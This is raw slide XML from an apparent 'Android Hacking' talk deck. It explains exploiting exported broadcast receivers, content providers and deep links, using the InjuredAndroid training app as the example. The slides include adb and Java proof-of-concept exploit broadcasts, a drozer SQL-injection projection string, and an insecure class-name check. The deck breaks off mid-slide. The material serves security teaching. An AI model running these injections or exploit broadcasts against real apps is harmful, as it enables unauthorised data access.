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hackerone.com/reports/200427" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/258460" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sqlitebrowser.org/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/FSecureLABS/drozer" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/272044" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/skylot/jadx" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.android.com/studio/command-line/adb" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sensepost/obje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Android Hacking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Google Shape;60;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="510450" y="3182331"/>
            <a:ext cx="8123100" cy="93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By Kyle B3nac</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>@b3nac</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874400"/>
            <a:ext cx="8520600" cy="448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rPr>
              <a:t>Vulnerable when receiver is exported and accepts user provided broadcasts.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>String totally = paramIntent.getStringExtra("totally");</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F5F5F5"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="88900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>String secure = paramIntent.getStringExtra("secure")</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F5F5F5"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="88900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ADB PoC</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="76200" marR="76200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="3C3C3C"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFF0F1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>adb shell am broadcast -a action com.b3nac.injuredandroid.intent.action.CUSTOM_INTENT --es totally "test" --es secure "test"</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="3C3C3C"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="EFF0F1"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="76200" marR="76200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="3C3C3C"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="EFF0F1"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="76200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3C3C3C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Java PoC</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="3C3C3C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="76200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="A9B7C6"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="2B2B2B"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>private</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="445588"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>send</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String totally = "test";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String secure = "test";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i="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="999988"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    // Create intent, set to matching action, send exploit broadcast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Intent intent = new Intent(getApplicationContext(), FlagFiveReceiver.class);</a:t>
            </a:r>
            <a:endParaRPr b="1"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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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intent.setAction("com.b3nac.injuredandroid.intent.action.CUSTOM_INTENT");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highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>intent.putExtra("totally", totally);</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intent.putExtra("secure", secure);</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00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    sendBroadcast(intent);</a:t>
            </a:r>
            <a:endParaRPr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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr b="1"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b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="88900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F5F5F5"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="88900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F5F5F5"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="88900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F5F5F5"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Google Shape;116;p22"/>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Exploitation of Android Broadcast Receivers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8166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rPr>
              <a:t>Content providers that connect to sqlite can be exploited via SQL injection by third party apps.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="76200" marR="76200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="242729"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>adb shell content query --uri &lt;URI&gt; [--user &lt;USER_ID&gt;] [--projection &lt;PROJECTION&gt;] [--where &lt;WHERE&gt;] [--sort &lt;SORT_ORDER&gt;]</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="242729"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="76200" marR="76200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="242729"/>
                </a:solidFill>
              </a:rPr>
              <a:t>With Drozer to make it easier.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="242729"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="76200" marR="76200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="DDF0DD"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>dz&gt; run app.provider.query content://app.test/ --projection "*FROM SQLITE MASTER WHERE type='table';--"</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="242729"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Upload content providers that only verify class names can be exploited to use third party activities that have the same name “com.app.spoofedactivity”. This is possible because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>android:grantUriPermissions="true" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
              </a:rPr>
              <a:t>and the boolean being used.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F8F8F8"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>public</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static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="445588"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>boolean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F8F8"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> checkOnlyClassName</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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Intent</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intent</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ComponentName</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component</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intent</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="008080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>getComponent</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String</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class</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component</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="008080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>getClassName</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:endParaRPr b="1"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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>        If (class.equals(classInAcceptedList)) {</a:t>
            </a:r>
            <a:endParaRPr b="1"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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>            //Allow access</a:t>
            </a:r>
            <a:endParaRPr b="1"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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>            return true;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="10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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>        }</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Google Shape;122;p23"/>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Exploitation of Android Content Providers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202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>“In Android, a deep link is a link that takes you directly to a specific destination within an app.”</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="202124"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="202124"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Think of deep links as Android urls to specific parts of the application.</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en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Usually mirrors web application except with a different schema that navigate directory to specific Android activities.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="202124"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>“Secure” implementation of a deeplink schema.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="202124"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
